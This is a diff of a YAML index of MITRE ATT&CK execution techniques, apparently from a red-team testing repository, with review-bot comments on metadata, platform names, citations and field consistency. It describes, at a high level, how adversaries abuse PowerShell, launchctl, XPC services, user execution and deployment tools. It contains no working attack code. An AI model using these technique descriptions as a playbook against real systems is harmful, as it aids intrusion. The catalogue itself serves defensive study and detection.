Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -28385,9 +28700,9 @@ execution:
2021.
url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
- source_name: Microsoft Win32
description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
March 15, 2020.
@@ -28404,19 +28719,18 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1106
atomic_tests: []
T1059.010:
technique:
- modified: '2024-04-10T16:05:22.456Z'
+ modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
- These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+ These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
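Review bot: the exectuable to executable fix is the only substantive change here and matches the upstream text, but the unchanged context line two lines above still reads "adversaries have used for AHK to execute payloads"; because this description is mirrored from ATT&CK it should be corrected upstream rather than hand-edited in the index, or the next regeneration reverts it.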
@@ -28425,7 +28739,7 @@ execution:
- Liran Ravich, CardinalOps
- Serhii Melnyk, Trustwave SpiderLabs
- Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
- - Monty
+ - "@_montysecurity"
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -28462,11 +28776,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:44:20.143Z'
name: Cloud API
description: "Adversaries may abuse cloud APIs to execute malicious commands.
APIs available in cloud environments provide various functionalities and are
@@ -28503,11 +28816,10 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
x_mitre_remote_support: false
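Review bot: the Cloud API platform list replaces Azure AD, Office 365 and Google Workspace with Office Suite and Identity Provider, following the upstream platform consolidation. Anything that filters techniques or builds per-platform indexes on the old strings will silently stop matching this technique, so platform-name lookups in the generator and any per-platform index files must be updated in the same change; the 1.0 to 1.1 version bump is consistent with the upstream edit.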
@@ -28526,13 +28838,12 @@ execution:
url: https://github.com/Azure/azure-powershell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -28611,12 +28922,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1059:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Command and Scripting Interpreter
description: |-
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -28627,6 +28937,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: |-
Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -28637,16 +28948,16 @@ execution:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- - Office 365
- - Azure AD
- IaaS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Script: Script Execution'
- 'Process: Process Creation'
@@ -28677,14 +28988,11 @@ execution:
url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059
atomic_tests: []
T1609:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:25:45.507Z'
name: Kubernetes Exec Into Container
description: |-
Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
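Review bot: for T1059 the `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` keys are removed from the end of the object here and re-inserted alphabetically among the other keys (after `kill_chain_phases` and after `x_mitre_is_subtechnique` in the two hunks above), whereas every other object in this patch keeps them at the end after `object_marking_refs`. Two key orderings in one file points at two serialization paths in the generator; a single stable ordering would limit future diffs to the fields that actually changed.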
@@ -28750,39 +29058,13 @@ execution:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1609
atomic_tests: []
T1569.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
- type: attack-pattern
- created: '2020-03-10T18:26:56.187Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569.001
- url: https://attack.mitre.org/techniques/T1569/001
- - source_name: Launchctl Man
- url: https://ss64.com/osx/launchctl.html
- description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
- - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
- description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
- Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
- source_name: Sofacy Komplex Trojan
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-20T20:14:35.179Z'
name: 'System Services: Launchctl'
description: |
Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -28791,6 +29073,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
plist file on disk which can be monitored. Monitor for recently modified or
created plist files with a significant change to the executable path executed
@@ -28803,19 +29086,42 @@ execution:
are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
the services are unloaded prior to deleting plist files."
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- 'Service: Service Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+ created: '2020-03-10T18:26:56.187Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569/001
+ external_id: T1569.001
+ - source_name: Sofacy Komplex Trojan
+ description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+ Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+ url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ - source_name: Launchctl Man
+ description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+ url: https://ss64.com/osx/launchctl.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1569.001
atomic_tests:
- name: Launchctl
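Review bot: `x_mitre_permissions_required` (User, root) is dropped for Launchctl here, as it was for T1059.007 earlier, but T1053.003 in this same patch keeps `x_mitre_permissions_required: - User` as unchanged context. If the field is being retired the Cron object should lose it too; if it is being kept, the removal here is a regression for consumers that display required permissions. Either way the treatment should be consistent across the file.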
@@ -28882,7 +29188,7 @@ execution:
data, modify startup configuration parameters to load malicious system software,
or to disable security features or logging to avoid detection.(Citation: Cisco
Synful Knock Evolution)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T20:28:09.848Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Device CLI
x_mitre_detection: |-
@@ -28898,72 +29204,75 @@ execution:
x_mitre_remote_support: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1559.003:
technique:
- x_mitre_platforms:
- - macOS
+ modified: '2024-10-16T16:14:12.793Z'
+ name: XPC Services
+ description: |-
+ Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+ Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_contributors:
+ - Csaba Fitzl @theevilbit of Kandji
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Csaba Fitzl @theevilbit of Offensive Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ x_mitre_remote_support: false
type: attack-pattern
id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
created: '2021-10-12T06:45:36.763Z'
- x_mitre_version: '1.0'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1559.003
url: https://attack.mitre.org/techniques/T1559/003
+ external_id: T1559.003
- source_name: creatingXPCservices
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
description: Apple. (2016, September 9). Creating XPC Services. Retrieved
April 19, 2022.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
- source_name: Designing Daemons Apple Dev
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
description: Apple. (n.d.). Retrieved October 12, 2021.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
- source_name: CVMServer Vuln
- url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
in macOS and iOS. Retrieved October 12, 2021.'
+ url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
- source_name: Learn XPC Exploitation
- url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
October 12, 2021.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
- Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XPC Services
- x_mitre_detection: ''
- kill_chain_phases:
- - phase_name: execution
- kill_chain_name: mitre-attack
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Process: Process Access'
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204:
technique:
- modified: '2024-04-12T03:46:49.507Z'
+ modified: '2024-11-11T18:52:12.103Z'
name: User Execution
description: |-
An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
- Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ Adversaries may also deceive users into performing actions such as:
+
+ * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+ * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+ * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
kill_chain_phases:
@@ -28971,7 +29280,11 @@ execution:
phase_name: execution
x_mitre_contributors:
- Oleg Skulkin, Group-IB
- - Goldstein Menachem
+ - Menachem Goldstein
+ - Harikrishnan Muthu, Cyble
+ - ReliaQuest
+ - Ale Houspanossian
+ - Fernando Bacchin
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -28986,7 +29299,7 @@ execution:
- macOS
- IaaS
- Containers
- x_mitre_version: '1.6'
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Instance: Instance Start'
- 'File: File Creation'
@@ -29013,6 +29326,10 @@ execution:
description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
Bookmarks. Retrieved January 2, 2024.
url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+ - source_name: Reliaquest-execution
+ description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+ Campaign. Retrieved August 2, 2024.
+ url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
- source_name: Telephone Attack Delivery
description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
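Review bot: the new reference spells the vendor `Reliaquest.` in its description and `Reliaquest-execution` in its key, while the contributor entry added in this same patch reads `ReliaQuest`; pick one spelling (the vendor writes ReliaQuest) so the citation key, description and contributor line agree.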
@@ -29023,15 +29340,19 @@ execution:
API forms and more to scam users in popular online game “Roblox”. Retrieved
January 2, 2024.
url: https://blog.talosintelligence.com/roblox-scam-overview/
+ - source_name: proofpoint-selfpwn
+ description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+ From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+ 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
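Review bot: `- spec_version: '2.1'` (the removed line just above `atomic_tests: []`) is dropped from every technique object in this patch with no replacement. In STIX 2.1 `spec_version` is a required property on every object, so anything downstream that re-serializes these `technique` maps as STIX will now fail validation; confirm the removal is deliberate (for example because consumers now key off `x_mitre_attack_spec_version`) and say so in the commit message.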
@@ -29048,7 +29369,7 @@ execution:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -29096,7 +29417,7 @@ execution:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -29129,12 +29450,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1059.001:
technique:
- modified: '2024-03-01T18:01:37.575Z'
+ modified: '2024-10-15T16:39:13.228Z'
name: 'Command and Scripting Interpreter: PowerShell'
description: |-
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process
cmdlet which can be used to run an executable and the Invoke-Command
cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
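Review bot: the `Github PSAttack` citation now points at `https://github.com/Exploit-install/PSAttack-1`, an unaffiliated copy, while the author field still reads `Haight, J.`. Sending readers of an offensive-tool citation to a third-party mirror is a supply-chain risk for anyone who clones what they find there; if the original `jaredhaight/PSAttack` repo is gone, prefer a web.archive.org snapshot of it (as this patch already does for the Cyphort EvilBunny reference) or state in the description that the URL is a mirror.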
@@ -29195,8 +29515,9 @@ execution:
POWERSHELL LOGGING. Retrieved February 16, 2016.
url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
- source_name: Github PSAttack
- description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
- url: https://github.com/jaredhaight/PSAttack
+ description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+ 2024.
+ url: https://github.com/Exploit-install/PSAttack-1
- source_name: inv_ps_attacks
description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
Retrieved December 1, 2021.
@@ -29218,12 +29539,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.001
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -29301,14 +29621,13 @@ execution:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1059.004:
technique:
- modified: '2024-04-16T12:24:40.163Z'
+ modified: '2024-10-15T15:17:19.136Z'
name: 'Command and Scripting Interpreter: Bash'
description: |-
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -29366,7 +29685,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.004
atomic_tests:
- name: Create and Execute Bash Shell Script
@@ -29464,31 +29782,7 @@ execution:
elevation_required: true
T1559:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
- type: attack-pattern
- created: '2020-02-12T14:08:48.689Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1559
- url: https://attack.mitre.org/techniques/T1559
- - source_name: Linux IPC
- url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
- description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
- March 11, 2022.
- - source_name: Fireeye Hunting COM June 2019
- url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
- description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
- 10, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-10T19:06:35.666Z'
name: Inter-Process Communication
description: "Adversaries may abuse inter-process communication (IPC) mechanisms
for local code or command execution. IPC is typically used by processes to
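Review bot: the new T1059.011 description carries hard line breaks in the middle of sentences (`via scripts (.lua` / `), or from Lua-embedded programs (through the struct lua_State` / `)`), which look like inline-code markup stripped on import; because the value is a `|-` block scalar those breaks are preserved as literal newlines in the rendered text. Restore the original inline code or join the lines before merging. The same pattern is visible in the unchanged T1059.001 and T1053.006 descriptions, so the fix belongs in the importer rather than in this one object. Separately, the `Lua state` reference points at a third-party mirror of the manual (pgl.yoyo.org); the official lua.org reference manual would be the better citation.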
@@ -29509,25 +29803,110 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
or spawned processes that are associated with abuse of IPC mechanisms.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
